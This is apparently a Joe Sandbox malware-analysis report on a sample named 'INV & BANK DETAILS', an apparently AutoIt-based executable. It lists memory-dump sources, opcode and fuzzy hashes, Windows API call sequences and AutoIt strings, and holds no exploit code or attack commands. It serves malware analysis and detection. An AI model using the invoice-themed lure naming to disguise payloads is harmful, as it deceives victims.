                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                APIs
                                • DeleteObject.GDI32(?), ref: 0045953B
                                • DeleteObject.GDI32(?), ref: 00459551
                                • DestroyWindow.USER32(?), ref: 00459563
                                • GetDesktopWindow.USER32 ref: 00459581
                                • GetWindowRect.USER32(00000000), ref: 00459588
                                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                • GetClientRect.USER32(00000000,?), ref: 004596F8
                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                • ShowWindow.USER32(?,00000004), ref: 00459865
                                • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                • GetStockObject.GDI32(00000011), ref: 004598CD
                                • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                • DeleteDC.GDI32(00000000), ref: 004598F8
                                • _wcslen.LIBCMT ref: 00459916
                                • _wcscpy.LIBCMT ref: 0045993A
                                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                • GetDC.USER32(00000000), ref: 004599FC
                                • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                • String ID: $AutoIt v3$DISPLAY$static
                                • API String ID: 4040870279-2373415609
                                • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                APIs
                                • GetSysColor.USER32(00000012), ref: 0044181E
                                • SetTextColor.GDI32(?,?), ref: 00441826
                                • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                • GetSysColor.USER32(0000000F), ref: 00441849
                                • SetBkColor.GDI32(?,?), ref: 00441864
                                • SelectObject.GDI32(?,?), ref: 00441874
                                • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                • GetSysColor.USER32(00000010), ref: 004418B2
                                • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                • DeleteObject.GDI32(?), ref: 004418D5
                                • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                • FillRect.USER32(?,?,?), ref: 00441970
                                  • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                  • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                  • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                  • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                  • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                  • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                  • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                  • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                  • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                  • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                  • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                  • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                  • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                • String ID:
                                • API String ID: 69173610-0
                                • Opcode ID: 73519c0d5c6d1b2cd2349601c553421bafd3f67ad8af7c83e76f5c4f38846835
                                • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                • Opcode Fuzzy Hash: 73519c0d5c6d1b2cd2349601c553421bafd3f67ad8af7c83e76f5c4f38846835
                                • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                APIs
                                • DestroyWindow.USER32(?), ref: 004590F2
                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                • GetClientRect.USER32(00000000,?), ref: 0045924E
                                • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                • GetStockObject.GDI32(00000011), ref: 004592AC
                                • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                • DeleteDC.GDI32(00000000), ref: 004592D6
                                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                • GetStockObject.GDI32(00000011), ref: 004593D3
                                • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                • API String ID: 2910397461-517079104
                                • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: __wcsnicmp
                                • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                • API String ID: 1038674560-3360698832
                                • Opcode ID: 5ac0d074d0f2c4f3e64cea3940d5eb1af2dab97db6e12398ad8f12eee9a98506
                                • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                • Opcode Fuzzy Hash: 5ac0d074d0f2c4f3e64cea3940d5eb1af2dab97db6e12398ad8f12eee9a98506
                                • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                APIs
                                • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                • SetCursor.USER32(00000000), ref: 0043075B
                                • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                • SetCursor.USER32(00000000), ref: 00430773
                                • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                • SetCursor.USER32(00000000), ref: 0043078B
                                • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                • SetCursor.USER32(00000000), ref: 004307A3
                                • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                • SetCursor.USER32(00000000), ref: 004307BB
                                • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                • SetCursor.USER32(00000000), ref: 004307D3
                                • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                • SetCursor.USER32(00000000), ref: 004307EB
                                • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                • SetCursor.USER32(00000000), ref: 00430803
                                • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                • SetCursor.USER32(00000000), ref: 0043081B
                                • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                • SetCursor.USER32(00000000), ref: 00430833
                                • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                • SetCursor.USER32(00000000), ref: 0043084B
                                • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                • SetCursor.USER32(00000000), ref: 00430863
                                • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                • SetCursor.USER32(00000000), ref: 0043087B
                                • SetCursor.USER32(00000000), ref: 00430887
                                • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                • SetCursor.USER32(00000000), ref: 0043089F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Cursor$Load
                                • String ID:
                                • API String ID: 1675784387-0
                                • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                APIs
                                • GetSysColor.USER32(0000000E), ref: 00430913
                                • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                • GetSysColor.USER32(00000012), ref: 00430933
                                • SetTextColor.GDI32(?,?), ref: 0043093B
                                • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                • GetSysColor.USER32(0000000F), ref: 00430959
                                • CreateSolidBrush.GDI32(?), ref: 00430962
                                • GetSysColor.USER32(00000011), ref: 00430979
                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                • SelectObject.GDI32(?,00000000), ref: 0043099C
                                • SetBkColor.GDI32(?,?), ref: 004309A6
                                • SelectObject.GDI32(?,?), ref: 004309B4
                                • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                • DrawFocusRect.USER32(?,?), ref: 00430A91
                                • GetSysColor.USER32(00000011), ref: 00430A9F
                                • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                • SelectObject.GDI32(?,?), ref: 00430AD0
                                • DeleteObject.GDI32(00000105), ref: 00430ADC
                                • SelectObject.GDI32(?,?), ref: 00430AE3
                                • DeleteObject.GDI32(?), ref: 00430AE9
                                • SetTextColor.GDI32(?,?), ref: 00430AF0
                                • SetBkColor.GDI32(?,?), ref: 00430AFB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                • String ID:
                                • API String ID: 1582027408-0
                                • Opcode ID: 90e9b5fb4d37338391ab9497a8c5b87626992c47cd1f836db1c6882af3371814
                                • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                • Opcode Fuzzy Hash: 90e9b5fb4d37338391ab9497a8c5b87626992c47cd1f836db1c6882af3371814
                                • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                APIs
                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: CloseConnectCreateRegistry
                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                • API String ID: 3217815495-966354055
                                • Opcode ID: 83ecef62884074c6d9a9244c2a653ecf9311b46b4a35863410e3534dee55722b
                                • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                • Opcode Fuzzy Hash: 83ecef62884074c6d9a9244c2a653ecf9311b46b4a35863410e3534dee55722b
                                • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                APIs
                                • GetCursorPos.USER32(?), ref: 004566AE
                                • GetDesktopWindow.USER32 ref: 004566C3
                                • GetWindowRect.USER32(00000000), ref: 004566CA
                                • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                • DestroyWindow.USER32(?), ref: 00456746
                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                • IsWindowVisible.USER32(?), ref: 0045682C
                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                • GetWindowRect.USER32(?,?), ref: 00456873
                                • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                • CopyRect.USER32(?,?), ref: 004568BE
                                • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                • String ID: ($,$tooltips_class32
                                • API String ID: 225202481-3320066284
                                • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
